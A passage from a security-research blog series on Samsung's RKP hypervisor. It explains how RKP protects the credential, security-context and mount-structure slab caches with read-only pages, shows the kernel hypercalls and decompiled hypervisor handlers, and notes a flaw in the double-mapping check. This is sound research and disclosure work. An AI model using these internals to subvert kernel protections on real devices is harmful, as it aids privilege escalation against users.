Binary Vulnerability Analysis 34: Samsung RKP Compendium (Part 2)

2024-1-6 07:14:23 Author: 安全狗的自我修养

Samsung RKP Compendium

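This blog post aims to provide a comprehensive reference on the inner workings of Samsung RKP. It should enable anyone to start poking at this obscure code, which runs at a high privilege level on their device. It also discloses a now-fixed vulnerability that allowed code execution in Samsung RKP. The bug is a good example of a simple mistake that compromises platform security: the exploit consists of a single call, which is all it takes to write to hypervisor memory from the kernel.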

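Introduction
Kernel Exploitation

JOPP
ROPP
KDP

Getting Started

Exynos Devices
Snapdragon Devices
Symbols and Log Strings
Hypervisor Crash Course
Our Research Platform
Extracting the Binary

Hypervisor Framework

APP_INIT
APP_RKP
Memlists
Sparsemaps
Critical Sections
Utility Structures
System Initialization
App Initialization
Exception Handling

Digging Into RKP

Protecting Kernel Data
Modifying Page Tables
Credentials Protection
Mount Namespace Protection
JOPP and ROPP Commands
First Level
Second Level
Third Level
Overall State After Startup
RKP Start
RKP Deferred Start
RKP Bitmaps
Startup
Page Tables Processing
RKP and KDP Commands

Vulnerability

Description
Exploitation
Patch

Conclusion
References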

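In the first part, we will briefly discuss Samsung's kernel mitigations (which would probably deserve a blog post of their own). In the second part, we will explain how to obtain the RKP binary for your device.

In the third part, we will start taking apart the hypervisor framework that supports RKP on Exynos devices, before digging into the internals of RKP in the fourth part. We will detail how it is started, how it processes the kernel page tables, how it protects sensitive data structures, and finally how it enables the kernel mitigations.

In the fifth and last part, we will reveal the vulnerability and its one-line exploit, and take a look at the patch.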


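SLUB Allocator¶

RKP not only protects global variables, it also protects specific caches of the SLUB allocator by backing them with read-only pages. These pages come from the hypervisor page allocator rather than the kernel page allocator. Three caches are protected this way:

cred_jar_ro, used to allocate struct cred;
tsec_jar, used to allocate struct task_security_struct;
vfsmnt_cache, used to allocate struct vfsmount.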

▸ include/linux/rkp.h

#define CRED_JAR_RO     "cred_jar_ro"
#define TSEC_JAR        "tsec_jar"
#define VFSMNT_JAR      "vfsmnt_cache"

Read-only pages are allocated by the rkp_ro_alloc function, which invokes the RKP_RKP_ROBUFFER_ALLOC command.

▸ include/linux/rkp.h

static inline void *rkp_ro_alloc(void){
    u64 addr = (u64)uh_call_static(UH_APP_RKP, RKP_RKP_ROBUFFER_ALLOC, 0);
    if(!addr)
        return 0;
    return (void *)__phys_to_virt(addr);
}

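Unsurprisingly, the allocate_slab function of the SLUB allocator calls rkp_ro_alloc if the cache is one of the three mentioned above. It then invokes a command to inform RKP of the cache type: RKP_KDP_X50 for cred_jar, RKP_KDP_X4E for tsec_jar, and RKP_KDP_X4F for vfsmnt_jar.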

▸ mm/slub.c

static struct page *allocate_slab(struct kmem_cache *s, gfp_t flags, int node)
{
    // ...
    if (s->name &&
        (!strcmp(s->name, CRED_JAR_RO) ||
        !strcmp(s->name, TSEC_JAR) ||
        !strcmp(s->name, VFSMNT_JAR))) {
        virt_page = rkp_ro_alloc();
        if(!virt_page)
            goto def_alloc;
        page = virt_to_page(virt_page);
        oo = s->min;
    } else {
    // ...
    /*
     * We modify the following so that slab alloc for protected data
     * types are allocated from our own pool.
     */
    if (s->name)  {
        u64 sc,va_page;
        va_page = (u64)__va(page_to_phys(page));
        if(!strcmp(s->name, CRED_JAR_RO)){
            for(sc = 0; sc < (1 << oo_order(oo)) ; sc++) {
                uh_call(UH_APP_RKP, RKP_KDP_X50, va_page, 0, 0, 0);
                va_page += PAGE_SIZE;
            }
        } 
        if(!strcmp(s->name, TSEC_JAR)){
            for(sc = 0; sc < (1 << oo_order(oo)) ; sc++) {
                uh_call(UH_APP_RKP, RKP_KDP_X4E, va_page, 0, 0, 0);
                va_page += PAGE_SIZE;
            }
        }
        if(!strcmp(s->name, VFSMNT_JAR)){
            for(sc = 0; sc < (1 << oo_order(oo)) ; sc++) {
                uh_call(UH_APP_RKP, RKP_KDP_X4F, va_page, 0, 0, 0);
                va_page += PAGE_SIZE;
            }
        }
    }
    // ...
    dmap_prot((u64)page_to_phys(page),(u64)compound_order(page),1);
    // ...
}
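
The repeated strcmp chains in allocate_slab boil down to a mapping from cache name to marking command, applied once per page of the slab. The sketch below shows that mapping in isolation. It is only an illustration: the enum values and the kdp_mark_cmd_for_cache and kdp_pages_in_slab helpers are hypothetical names, and the real command numbers behind RKP_KDP_X50, RKP_KDP_X4E and RKP_KDP_X4F are not given in this text.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

#define CRED_JAR_RO "cred_jar_ro"
#define TSEC_JAR    "tsec_jar"
#define VFSMNT_JAR  "vfsmnt_cache"

/* Hypothetical identifiers: the real command numbers are not given in the text. */
enum kdp_mark_cmd {
    KDP_MARK_NONE = 0,
    KDP_MARK_CRED,   /* stands in for RKP_KDP_X50 */
    KDP_MARK_TSEC,   /* stands in for RKP_KDP_X4E */
    KDP_MARK_VFSMNT  /* stands in for RKP_KDP_X4F */
};

/* Return the marking command for a cache name, or KDP_MARK_NONE if unprotected. */
enum kdp_mark_cmd kdp_mark_cmd_for_cache(const char *name)
{
    if (name == NULL)
        return KDP_MARK_NONE;
    if (strcmp(name, CRED_JAR_RO) == 0)
        return KDP_MARK_CRED;
    if (strcmp(name, TSEC_JAR) == 0)
        return KDP_MARK_TSEC;
    if (strcmp(name, VFSMNT_JAR) == 0)
        return KDP_MARK_VFSMNT;
    return KDP_MARK_NONE;
}

/* Number of pages in a slab of the given order (one hypercall per page). */
unsigned long kdp_pages_in_slab(unsigned int order)
{
    return 1UL << order;
}
```

With such a helper, the three loops in allocate_slab could share one body that issues the returned command for each of the kdp_pages_in_slab(order) pages.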

Read-only pages are freed by the rkp_ro_free function, which invokes the RKP_RKP_ROBUFFER_FREE command.

▸ include/linux/rkp.h

static inline void rkp_ro_free(void *free_addr){
    uh_call_static(UH_APP_RKP, RKP_RKP_ROBUFFER_FREE, (u64)free_addr);
}

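This function is called from free_ro_pages in the SLUB allocator, which iterates over all the pages to be freed. In addition to calling rkp_ro_free, it also invokes the RKP_KDP_X48 command, which reverts the changes made by the RKP_KDP_X50, RKP_KDP_X4E, and RKP_KDP_X4F commands.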

▸ mm/slub.c

static void free_ro_pages(struct kmem_cache *s,struct page *page, int order)
{
    unsigned long flags;
    unsigned long long sc,va_page;

    sc = 0;
    va_page = (unsigned long long)__va(page_to_phys(page));
    if(is_rkp_ro_page(va_page)){
        for(sc = 0; sc < (1 << order); sc++) {
            uh_call(UH_APP_RKP, RKP_KDP_X48, va_page, 0, 0, 0);
            rkp_ro_free((void *)va_page);
            va_page += PAGE_SIZE;
        }
        return;
    }
    spin_lock_irqsave(&ro_pages_lock,flags);
    for(sc = 0; sc < (1 << order); sc++) {
        uh_call(UH_APP_RKP, RKP_KDP_X48, va_page, 0, 0, 0);
        va_page += PAGE_SIZE;
    }
    memcg_uncharge_slab(page, order, s);
    __free_pages(page, order);
    spin_unlock_irqrestore(&ro_pages_lock,flags);
}

Unsurprisingly, the __free_slab function of the SLUB allocator calls free_ro_pages if the cache is one of the three mentioned above.

▸ mm/slub.c

static void __free_slab(struct kmem_cache *s, struct page *page)
{
    // ...
    dmap_prot((u64)page_to_phys(page),(u64)compound_order(page),0);
    // ...
    /* We free the protected pages here. */
    if (s->name && (!strcmp(s->name, CRED_JAR_RO) || 
        !strcmp(s->name, TSEC_JAR) || 
        !strcmp(s->name, VFSMNT_JAR))){
        free_ro_pages(s,page, order);
        return;
    }
    // ...
}

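Since the pages of these caches are read-only, the kernel cannot update the freelist pointer of their objects itself and needs to call into the hypervisor. This is why the set_freepointer function of the SLUB allocator invokes the RKP_KDP_X44 command when the cache is one of the three mentioned above.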

▸ mm/slub.c

static inline void set_freepointer(struct kmem_cache *s, void *object, void *fp)
{
    // ...
    if (rkp_cred_enable && s->name && 
        (!strcmp(s->name, CRED_JAR_RO)|| !strcmp(s->name, TSEC_JAR) ||
                                    !strcmp(s->name, VFSMNT_JAR))) {
        uh_call(UH_APP_RKP, RKP_KDP_X44, (u64)object, (u64)s->offset,
            (u64)freelist_ptr(s, fp, freeptr_addr), 0);
    }
    // ...
}

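The last RKP feature related to the SLUB allocator is double-mapping prevention. You might have noticed the calls to dmap_prot in the allocate_slab and __free_slab functions. It invokes the RKP_KDP_X4A command to notify the hypervisor that this address is being mapped.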

▸ include/linux/rkp.h

static inline void dmap_prot(u64 addr,u64 order,u64 val)
{
    if(rkp_cred_enable)
        uh_call(UH_APP_RKP, RKP_KDP_X4A, order, val, 0, 0);
}

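The cred_jar_ro and tsec_jar caches are created in cred_init. This function also invokes the RKP_KDP_X42 command to inform RKP of the sizes of the cred and task_security_struct structures so that it can handle them properly.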

▸ kernel/cred.c

void __init cred_init(void)
{
    // ...
#ifdef  CONFIG_RKP_KDP
    if(rkp_cred_enable) {
        cred_jar_ro = kmem_cache_create("cred_jar_ro", sizeof(struct cred),
                0, SLAB_HWCACHE_ALIGN|SLAB_PANIC|SLAB_ACCOUNT, cred_ctor);
        if(!cred_jar_ro) {
            panic("Unable to create RO Cred cache\n");
        }

        tsec_jar = kmem_cache_create("tsec_jar", rkp_get_task_sec_size(),
                0, SLAB_HWCACHE_ALIGN|SLAB_PANIC|SLAB_ACCOUNT, sec_ctor);
        if(!tsec_jar) {
            panic("Unable to create RO security cache\n");
        }
        // ...
        uh_call(UH_APP_RKP, RKP_KDP_X42, (u64)cred_jar_ro->size, (u64)tsec_jar->size, 0, 0);
    }
#endif  /* CONFIG_RKP_KDP */
}

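Similarly, the vfsmnt_cache cache is created in mnt_init. This function invokes the RKP_KDP_X41 command to inform RKP of the total size of the vfsmount structure and of the offsets of several of its fields.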

▸ fs/namespace.c

void __init mnt_init(void)
{
    // ...
    vfsmnt_cache = kmem_cache_create("vfsmnt_cache", sizeof(struct vfsmount),
            0, SLAB_HWCACHE_ALIGN | SLAB_PANIC, cred_ctor_vfsmount);

    if(!vfsmnt_cache)
        panic("Failed to allocate vfsmnt_cache \n");
    rkp_ns_fill_params(nsparam,vfsmnt_cache->size,sizeof(struct vfsmount),(u64)offsetof(struct vfsmount,bp_mount),
                                        (u64)offsetof(struct vfsmount,mnt_sb),(u64)offsetof(struct vfsmount,mnt_flags),
                                        (u64)offsetof(struct vfsmount,data));
    uh_call(UH_APP_RKP, RKP_KDP_X41, (u64)&nsparam, 0, 0, 0);
  // ...
}

For reference, here is the ns_param_t structure that is passed as the command argument:

▸ include/linux/rkp.h

typedef struct ns_param {
    u32 ns_buff_size;
    u32 ns_size;
    u32 bp_offset;
    u32 sb_offset;
    u32 flag_offset;
    u32 data_offset;
}ns_param_t;

The rkp_ns_fill_params macro used to fill this structure is as follows:

▸ include/linux/rkp.h

#define rkp_ns_fill_params(nsparam,buff_size,size,bp,sb,flag,data)  \
do {                        \
    nsparam.ns_buff_size = (u64)buff_size;      \
    nsparam.ns_size  = (u64)size;       \
    nsparam.bp_offset = (u64)bp;        \
    nsparam.sb_offset = (u64)sb;        \
    nsparam.flag_offset = (u64)flag;        \
    nsparam.data_offset = (u64)data;        \
} while(0)

The mnt_init function, which initializes the vfsmnt_cache cache, is called from vfs_caches_init.

▸ fs/dcache.c

void __init vfs_caches_init(void)
{
    // ...
    mnt_init();
    // ...
}

The cred_init function, which initializes the cred_jar_ro and tsec_jar caches, and the vfs_caches_init function are both called from start_kernel.

▸ init/main.c

asmlinkage __visible void __init start_kernel(void)
{
    // ...
    cred_init();
    // ...
    vfs_caches_init();
    // ...
}

The table below summarizes which RKP commands the SLUB allocator uses and for what purpose:

Command	Function	Description
`RKP_RKP_ROBUFFER_ALLOC`	`rkp_cmd_rkp_robuffer_alloc`	Allocate a read-only page
`RKP_RKP_ROBUFFER_FREE`	`rkp_cmd_rkp_robuffer_free`	Free a read-only page
`RKP_KDP_X50`	`rkp_cmd_set_pages_ro_cred_jar`	Mark a slab of `cred_jar`
`RKP_KDP_X4E`	`rkp_cmd_set_pages_ro_tsec_jar`	Mark a slab of `tsec_jar`
`RKP_KDP_X4F`	`rkp_cmd_set_pages_ro_vfsmnt_jar`	Mark a slab of `vfsmnt_jar`
`RKP_KDP_X48`	`rkp_cmd_ro_free_pages`	Unmark a slab
`RKP_KDP_X44`	`rkp_cmd_cred_set_fp`	Set the freelist pointer inside an object
`RKP_KDP_X4A`	`rkp_cmd_prot_dble_map`	Prevent double mapping
`RKP_KDP_X42`	`rkp_cmd_assign_cred_size`	Inform RKP of the cred object sizes
`RKP_KDP_X41`	`rkp_cmd_assign_ns_size`	Inform RKP of the ns object size

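We can now look at the hypervisor side of these commands, starting with the functions that allocate and free read-only pages.

rkp_cmd_rkp_robuffer_alloc simply allocates a page from the hypervisor page allocator (which uses the "robuf" region that we saw earlier). The ha1/ha2 stuff is only used by the RKP test module and can safely be ignored.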

int64_t rkp_cmd_rkp_robuffer_alloc(saved_regs_t* regs) {
  // ...
  // Request a page from the hypervisor page allocator.
  page = page_allocator_alloc_page();
  ret_p = regs->x2;
  // The following code is only used for testing purposes.
  if ((ret_p & 1) != 0) {
    if (ha1 != 0 || ha2 != 0) {
      rkp_policy_violation("Setting ha1 or ha2 should be done once");
    }
    ret_p &= 0xfffffffffffffffe;
    ha1 = page;
    ha2 = page + 8;
  }
  // If x2 contains a kernel pointer, store the page address into it.
  if (ret_p) {
    if (!page) {
      uh_log('L', "rkp.c", 270, "RKP_8f7b0e12");
    }
    *virt_to_phys_el1(ret_p) = page;
  }
  // Also store the page address into the x0 register.
  regs->x0 = page;
  return 0;
}

Similarly, rkp_cmd_rkp_robuffer_free simply hands the page back to the hypervisor page allocator.

int64_t rkp_cmd_rkp_robuffer_free(saved_regs_t* regs) {
  // ...
  // Sanity-checking on the page address in x2.
  if (!regs->x2) {
    uh_log('D', "rkp.c", 286, "Robuffer Free wrong address");
  }
  // Convert the VA given by the kernel into a PA.
  page = rkp_get_pa(regs->x2);
  // Free the page in the hypervisor page allocator.
  page_allocator_free_page(page);
  return 0;
}

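The kernel invokes the rkp_cmd_set_pages_ro_cred_jar, rkp_cmd_set_pages_ro_tsec_jar, and rkp_cmd_set_pages_ro_vfsmnt_jar functions to inform the hypervisor of the cache type for which a read-only page has been allocated. These functions all end up calling rkp_set_pages_ro, but with different arguments.

The rkp_set_pages_ro function converts the kernel VA into a PA, then marks the page as read-only in the second stage. It then resets the page content (the decompiled code below fills it with 0xff bytes) and marks it with the appropriate type (CRED, SEC_PTR, or NS) in the physmap.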

uint8_t* rkp_set_pages_ro(saved_regs_t* regs, int64_t type) {
  // ...
  // Sanity-check: the kernel virtual address must be page-aligned.
  if ((regs->x2 & 0xfff) != 0) {
    return uh_log('L', "rkp_kdp.c", 803, "Page not aligned in set_page_ro %lx", regs->x2);
  }
  // Convert the kernel virtual address into a physical address.
  page = rkp_get_pa(regs->x2);
  rkp_phys_map_lock(page);
  // Make the target page read-only in the second stage.
  if (rkp_s2_page_change_permission(page, 0x80 /* read-only */, 0 /* non-executable */, 0) == -1) {
    uh_log('L', "rkp_kdp.c", 813, "Cred: Unable to set permission %lx %lx %lx", regs->x2, page, 0);
  } else {
    // Reset the page to avoid leaking previous content.
    memset(page, 0xff, 0x1000);
    // Compute the corresponding type based on the argument.
    switch (type) {
      case 0:
        type = CRED;
        break;
      case 1:
        type = SEC_PTR;
        break;
      case 2:
        type = NS;
        break;
    }
    // Mark the page in the physmap.
    rkp_phys_map_set(page, type);
    return rkp_phys_map_unlock(page);
  }
  return rkp_phys_map_unlock(page);
}

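The rkp_cmd_ro_free_pages function is called to revert the above changes when a page is freed. It calls rkp_ro_free_pages, which also converts the kernel VA into a PA and verifies that the page is marked with one of the expected types in the physmap. If everything checks out, it makes the page writable in the second stage, zeroes it, and marks it as FREE in the physmap.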

uint8_t* rkp_ro_free_pages(saved_regs_t* regs) {
  // ...
  // Sanity-check: the kernel virtual address must be page-aligned.
  if ((regs->x2 & 0xfff) != 0) {
    return uh_log('L', "rkp_kdp.c", 843, "Page not aligned in set_page_ro %lx", regs->x2);
  }
  // Convert the kernel virtual address into a physical address.
  page = rkp_get_pa(regs->x2);
  rkp_phys_map_lock(page);
  // Check if the page is marked with the appropriate type in the physmap.
  if (!is_phys_map_cred(page) && !is_phys_map_ns(page) && !is_phys_map_sec_ptr(page)) {
    uh_log('L', "rkp_kdp.c", 854, "rkp_ro_free_pages : physmap_entry_invalid %lx %lx ", regs->x2, page);
    return rkp_phys_map_unlock(page);
  }
  // Make the target page writable in the second stage.
  if (rkp_s2_page_change_permission(page, 0 /* writable */, 1 /* executable */, 0) < 0) {
    uh_log('L', "rkp_kdp.c", 862, "rkp_ro_free_pages: Unable to set permission %lx %lx %lx", regs->x2, page);
    return rkp_phys_map_unlock(page);
  }
  // Reset the page to avoid leaking current content.
  memset(page, 0, 0x1000);
  // Mark the page as `FREE` in the physmap.
  rkp_phys_map_set(page, FREE);
  return rkp_phys_map_unlock(page);
}
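
The lifecycle implemented by rkp_set_pages_ro and rkp_ro_free_pages can be summarized with a toy model. The sketch below is not the hypervisor code: it assumes a four-page address space, replaces the stage 2 permission change with a simple flag, and every demo_ name is hypothetical. It only illustrates the order of operations (alignment check, permission change, content reset, physmap tagging) and the fact that freeing requires the page to carry one of the protected types.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

#define DEMO_PAGE_SIZE 0x1000u
#define DEMO_NUM_PAGES 4u

/* Page types named after the ones in the text; the numeric values are arbitrary. */
enum demo_type { DEMO_FREE = 0, DEMO_CRED, DEMO_SEC_PTR, DEMO_NS };

/* Toy model: a per-page type table, a read-only flag and backing memory. */
enum demo_type demo_physmap[DEMO_NUM_PAGES];
int demo_read_only[DEMO_NUM_PAGES];
uint8_t demo_memory[DEMO_NUM_PAGES][DEMO_PAGE_SIZE];

/* Mark a page read-only, reset its content and tag it with `type`. */
int demo_set_page_ro(uint64_t addr, enum demo_type type)
{
    if ((addr & (DEMO_PAGE_SIZE - 1)) != 0)
        return -1;                          /* not page-aligned */
    uint64_t idx = addr / DEMO_PAGE_SIZE;
    if (idx >= DEMO_NUM_PAGES)
        return -1;                          /* outside the toy address space */
    demo_read_only[idx] = 1;                /* stands in for the stage 2 change */
    memset(demo_memory[idx], 0xff, DEMO_PAGE_SIZE);
    demo_physmap[idx] = type;
    return 0;
}

/* Revert the above: only pages tagged with a protected type are accepted. */
int demo_ro_free_page(uint64_t addr)
{
    if ((addr & (DEMO_PAGE_SIZE - 1)) != 0)
        return -1;
    uint64_t idx = addr / DEMO_PAGE_SIZE;
    if (idx >= DEMO_NUM_PAGES)
        return -1;
    if (demo_physmap[idx] == DEMO_FREE)
        return -1;                          /* not a protected page */
    demo_read_only[idx] = 0;
    memset(demo_memory[idx], 0, DEMO_PAGE_SIZE);
    demo_physmap[idx] = DEMO_FREE;
    return 0;
}
```

In this model, freeing a page twice fails the second time because the first call already retagged it as free, which mirrors the physmap check in rkp_ro_free_pages.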

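The SLUB allocator invokes the rkp_cred_set_fp function to change the freelist pointer (the pointer to the next free object) of a read-only object. It ensures that the object is marked with one of the protected types in the physmap, and that the next free object, if there is one, is marked likewise. Before finally updating the freelist pointer inside the object, it performs some sanity checks on the object address and on the pointer offset.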

void rkp_cred_set_fp(saved_regs_t* regs) {
  // ...
  // Convert the object virtual address into a physical address.
  object_pa = rkp_get_pa(regs->x2);
  // `offset` is the offset of the freelist pointer in the object.
  offset = regs->x3;
  // `freelist_ptr` is the value to be written at `offset` in the object.
  freelist_ptr = regs->x4;
  rkp_phys_map_lock(object_pa);
  // Ensure the object is located in one of the 3 caches.
  if (!is_phys_map_cred(object_pa) && !is_phys_map_sec_ptr(object_pa) && !is_phys_map_ns(object_pa)) {
    uh_log('L', "rkp_kdp.c", 242, "Neither Cred nor Secptr %lx %lx %lx", regs->x2, regs->x3, regs->x4);
    is_cred = is_phys_map_cred(object_pa);
    is_sec_ptr = is_phys_map_sec_ptr(object_pa);
    // If not, trigger a policy violation.
    rkp_policy_violation("Data Protection Violation %lx %lx %lx", is_cred, is_sec_ptr, regs->x4);
    rkp_phys_map_unlock(object_pa);
  }
  rkp_phys_map_unlock(object_pa);
  // If the freelist pointer (next free object) is not NULL.
  if (freelist_ptr) {
    // Convert the next free object VA into a PA.
    freelist_ptr_pa = rkp_get_pa(freelist_ptr);
    rkp_phys_map_lock(freelist_ptr_pa);
    // Ensure the next free object is also located in one of the 3 caches.
    if (!is_phys_map_cred(freelist_ptr_pa) && !is_phys_map_sec_ptr(freelist_ptr_pa) &&
        !is_phys_map_ns(freelist_ptr_pa)) {
      uh_log('L', "rkp_kdp.c", 259, "Invalid Free Pointer %lx %lx %lx", regs->x2, regs->x3, regs->x4);
      is_cred = is_phys_map_cred(freelist_ptr_pa);
      is_sec_ptr = is_phys_map_sec_ptr(freelist_ptr_pa);
      // If not, trigger a policy violation.
      rkp_policy_violation("Data Protection Violation %lx %lx %lx", is_cred, is_sec_ptr, regs->x4);
      rkp_phys_map_unlock(freelist_ptr_pa);
    }
    rkp_phys_map_unlock(freelist_ptr_pa);
  }
  // Sanity-checking on the object address within the page and freelist pointer offset.
  if (invalid_cred_fp(object_pa, regs->x2, offset)) {
    uh_log('L', "rkp_kdp.c", 267, "Invalid cred pointer_fp!! %lx %lx %lx", regs->x2, regs->x3, regs->x4);
    rkp_policy_violation("Data Protection Violation %lx %lx %lx", regs->x2, regs->x3, regs->x4);
  } else if (invalid_sec_ptr_fp(object_pa, regs->x2, offset)) {
    uh_log('L', "rkp_kdp.c", 272, "Invalid Security pointer_fp 111 %lx %lx %lx", regs->x2, regs->x3, regs->x4);
    is_sec_ptr = is_phys_map_sec_ptr(object_pa);
    uh_log('L', "rkp_kdp.c", 273, "Invalid Security pointer_fp 222 %lx %lx %lx %lx %lx", is_sec_ptr, regs->x2,
           regs->x2 - regs->x2 / rkp_cred->SP_BUFF_SIZE * rkp_cred->SP_BUFF_SIZE, offset, rkp_cred->SP_SIZE);
    rkp_policy_violation("Data Protection Violation %lx %lx %lx", regs->x2, regs->x3, regs->x4);
  } else if (invalid_ns_fp(object_pa, regs->x2, offset)) {
    uh_log('L', "rkp_kdp.c", 278, "Invalid Namespace pointer_fp!! %lx %lx %lx", regs->x2, regs->x3, regs->x4);
    rkp_policy_violation("Data Protection Violation %lx %lx %lx", regs->x2, regs->x3, regs->x4);
  }
  // Update the freelist pointer within the object if the checks passed.
  else {
    *(offset + object_pa) = freelist_ptr;
  }
}

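The invalid_cred_fp, invalid_sec_ptr_fp, and invalid_ns_fp functions all perform the same checks. When the object PA is marked with their type in the physmap, they ensure that the VA is aligned on the object size, and finally that the freelist pointer offset is equal to the object size (which is the case for caches that have a constructor). When the page is not of their type, they return 0, which lets rkp_cred_set_fp chain the three checks.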

int64_t invalid_cred_fp(int64_t object_pa, uint64_t object_va, int64_t offset) {
  rkp_phys_map_lock(object_pa);
  // Ensure the object PA is marked as `CRED` in the physmap.
  if (!is_phys_map_cred(object_pa) ||
      // Ensure the object VA is aligned on the size of the cred structure.
      object_va && object_va == object_va / rkp_cred->CRED_BUFF_SIZE * rkp_cred->CRED_BUFF_SIZE &&
          // Ensure the offset is equal to the size of the cred structure.
          rkp_cred->CRED_SIZE == offset) {
    rkp_phys_map_unlock(object_pa);
    return 0;
  } else {
    rkp_phys_map_unlock(object_pa);
    return 1;
  }
}

int64_t invalid_sec_ptr_fp(int64_t object_pa, uint64_t object_va, int64_t offset) {
  rkp_phys_map_lock(object_pa);
  // Ensure the object PA is marked as `SEC_PTR` in the physmap.
  if (!is_phys_map_sec_ptr(object_pa) ||
      // Ensure the object VA is aligned on the size of the task_security_struct structure.
      object_va && object_va == object_va / rkp_cred->SP_BUFF_SIZE * rkp_cred->SP_BUFF_SIZE &&
          // Ensure the offset is equal to the size of the task_security_struct structure.
          rkp_cred->SP_SIZE == offset) {
    rkp_phys_map_unlock(object_pa);
    return 0;
  } else {
    rkp_phys_map_unlock(object_pa);
    return 1;
  }
}

int64_t invalid_ns_fp(int64_t object_pa, uint64_t object_va, int64_t offset) {
  rkp_phys_map_lock(object_pa);
  // Ensure the object PA is marked as `NS` in the physmap.
  if (!is_phys_map_ns(object_pa) ||
      // Ensure the object VA is aligned on the size of the vfsmount structure.
      object_va && object_va == object_va / rkp_cred->NS_BUFF_SIZE * rkp_cred->NS_BUFF_SIZE &&
          // Ensure the offset is equal to the size of the vfsmount structure.
          rkp_cred->NS_SIZE == offset) {
    rkp_phys_map_unlock(object_pa);
    return 0;
  } else {
    rkp_phys_map_unlock(object_pa);
    return 1;
  }
}
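
Since the three functions only differ in the physmap type and the size fields they consult, their logic can be condensed into one pure function. The following is a minimal sketch under that reading, not the hypervisor's code: demo_invalid_fp and its parameters are hypothetical, the physmap lookup is replaced by a boolean, and the rejection of a zero buff_size is an addition made here to keep the sketch free of a division by zero.

```c
#include <assert.h>
#include <stdint.h>

/*
 * Returns 1 when the (object_va, offset) pair should be rejected.
 * `buff_size` plays the role of CRED_BUFF_SIZE (slot size in the cache)
 * and `obj_size` the role of CRED_SIZE (size of the structure itself).
 */
int demo_invalid_fp(int page_has_type, uint64_t object_va,
                    uint64_t buff_size, uint64_t obj_size, uint64_t offset)
{
    if (!page_has_type)
        return 0;          /* not this cache's page: the check does not apply */
    if (object_va == 0 || buff_size == 0)
        return 1;          /* NULL object, or sizes not configured yet */
    if (object_va % buff_size != 0)
        return 1;          /* VA is not aligned on the slot size */
    if (offset != obj_size)
        return 1;          /* freelist pointer must sit right after the object */
    return 0;
}
```

The modulo test is equivalent to the `object_va == object_va / size * size` expression used in the decompiled code.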

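The rkp_cmd_prot_dble_map function is called to notify the hypervisor that one or more pages are being mapped or unmapped, with the end goal of preventing double mappings. This function calls rkp_prot_dble_map, which sets or unsets the bit of dbl_bitmap for each page of the region.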

saved_regs_t* rkp_prot_dble_map(saved_regs_t* regs) {
  // ...
  // Sanity-check: the base address must be page-aligned.
  address = regs->x2 & 0xfffffffff000;
  if (!address) {
    return 0;
  }
  // The value to put in the bitmap (0 = unmapped, 1 = mapped).
  val = regs->x4;
  if (val > 1) {
    uh_log('L', "rkp_kdp.c", 1163, "Invalid op val %lx ", val);
    return 0;
  }
  // The order, from which the size of the region can be calculated.
  order = regs->x3;
  if (order <= 19) {
    offset = 0;
    size = 0x1000 << order;
    // Iterate over all the pages in the target region.
    do {
      // Set the `dbl_bitmap` value for the current page.
      res = rkp_set_map_bitmap(address + offset, val);
      if (!res) {
        uh_log('L', "rkp_kdp.c", 1169, "Page has no bitmap %lx %lx %lx ", address + offset, val, offset);
      }
      offset += 0x1000;
    } while (offset < size);
  }
}
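
The per-page loop of rkp_prot_dble_map can be reproduced on a toy bitmap. The sketch below assumes a 64-page address space stored in a single 64-bit word, which is not how the real dbl_bitmap is laid out, and all demo_ names are hypothetical. It keeps the same argument checks as the decompiled function: a non-zero page-aligned address, a value of 0 or 1, and an order of at most 19.

```c
#include <assert.h>
#include <stdint.h>

#define DEMO_PAGE_SHIFT 12
#define DEMO_MAX_PAGES  64u     /* toy address space: 64 pages */

uint64_t demo_dbl_bitmap;       /* one bit per page */

/* Set (val = 1) or clear (val = 0) the bit of one page; returns 0 if out of range. */
int demo_set_map_bitmap(uint64_t addr, uint64_t val)
{
    uint64_t idx = addr >> DEMO_PAGE_SHIFT;
    if (idx >= DEMO_MAX_PAGES)
        return 0;               /* this page has no bitmap bit */
    if (val)
        demo_dbl_bitmap |= (1ULL << idx);
    else
        demo_dbl_bitmap &= ~(1ULL << idx);
    return 1;
}

/* Returns the number of pages updated, or -1 on invalid arguments. */
int demo_prot_dble_map(uint64_t addr, uint64_t order, uint64_t val)
{
    addr &= ~((1ULL << DEMO_PAGE_SHIFT) - 1);
    if (addr == 0 || val > 1 || order > 19)
        return -1;
    uint64_t size = (1ULL << DEMO_PAGE_SHIFT) << order;
    int updated = 0;
    /* Iterate over every page of the 2^order-page region. */
    for (uint64_t off = 0; off < size; off += 1ULL << DEMO_PAGE_SHIFT)
        updated += demo_set_map_bitmap(addr + off, val);
    return updated;
}
```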

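Attentive readers will have noticed that the kernel function dmap_prot does not call the hypervisor function rkp_prot_dble_map properly: it does not pass its addr argument, so the arguments are all shifted and nothing works as intended.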
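
The argument mismatch described above can be modeled in a few lines. The sketch assumes that the four uh_call arguments land in x2 to x5, which matches how the handlers in this article read regs->x2 as the first argument; the placement of the app and command identifiers in x0 and x1 is an assumption, and all demo_ names, including the "fixed" variant, are hypothetical rather than Samsung's code.

```c
#include <assert.h>
#include <stdint.h>

/* Registers as seen by a handler: x2..x5 carry the four call arguments. */
typedef struct demo_regs { uint64_t x0, x1, x2, x3, x4, x5; } demo_regs_t;

/* Stand-in for uh_call: just records where each argument ends up. */
demo_regs_t demo_uh_call(uint64_t app, uint64_t cmd, uint64_t a0,
                         uint64_t a1, uint64_t a2, uint64_t a3)
{
    demo_regs_t r = { app, cmd, a0, a1, a2, a3 };
    return r;
}

/* What rkp_prot_dble_map extracts from the registers. */
typedef struct demo_dmap_args { uint64_t address, order, val; } demo_dmap_args_t;

demo_dmap_args_t demo_decode(const demo_regs_t *r)
{
    demo_dmap_args_t a = { r->x2 & 0xfffffffff000ULL, r->x3, r->x4 };
    return a;
}

/* The call as quoted from include/linux/rkp.h: addr is never passed. */
demo_regs_t demo_dmap_prot_as_shipped(uint64_t addr, uint64_t order, uint64_t val)
{
    (void)addr;
    return demo_uh_call(0, 0, order, val, 0, 0);
}

/* Hypothetical corrected call that passes addr first. */
demo_regs_t demo_dmap_prot_fixed(uint64_t addr, uint64_t order, uint64_t val)
{
    return demo_uh_call(0, 0, addr, order, val, 0);
}
```

In this model, the order ends up where the address is expected. Any order below 0x1000 is masked down to 0, so the handler takes its early `if (!address) return 0;` exit and the bitmap is never updated.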

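The last two functions used by the kernel, rkp_cmd_assign_cred_size and rkp_cmd_assign_ns_size, tell the hypervisor the size of the structures allocated in the read-only caches.

rkp_cmd_assign_cred_size calls rkp_assign_cred_size, which saves the sizes of the cred and task_security_struct structures into global variables.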

